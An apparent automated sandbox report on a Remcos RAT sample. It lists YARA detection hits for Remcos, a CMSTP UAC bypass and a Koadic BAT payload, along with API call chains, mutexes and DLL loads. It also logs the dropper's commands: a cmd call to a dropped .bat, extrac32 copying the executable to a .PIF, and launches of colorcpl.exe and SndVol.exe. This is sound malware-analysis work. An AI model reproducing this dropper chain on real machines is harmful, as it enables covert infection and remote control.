                  Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\Public\Libraries\OcihlomcO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/11@4/3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04677952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_04677952
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C647952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_1C647952
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A7F8E GetDiskFreeSpaceA,0_2_028A7F8E
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B9E10 CreateToolhelp32Snapshot,0_2_028B9E10
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B6D84 CoCreateInstance,0_2_028B6D84
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,5_2_0467B4A8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0467AC78
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeFile created: C:\Users\Public\Libraries\NullJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
                  Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-TALGAI
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" "
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: XY2I8rWLkM.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeFile read: C:\Users\user\Desktop\XY2I8rWLkM.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\XY2I8rWLkM.exe "C:\Users\user\Desktop\XY2I8rWLkM.exe"
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\XY2I8rWLkM.exe C:\\Users\\Public\\Libraries\\Ocihlomc.PIF
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\Public\Libraries\Ocihlomc.PIF "C:\Users\Public\Libraries\Ocihlomc.PIF"
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: unknownProcess created: C:\Users\Public\Libraries\Ocihlomc.PIF "C:\Users\Public\Libraries\Ocihlomc.PIF"
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" "Jump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\XY2I8rWLkM.exe C:\\Users\\Public\\Libraries\\Ocihlomc.PIFJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: archiveint.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: eamsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
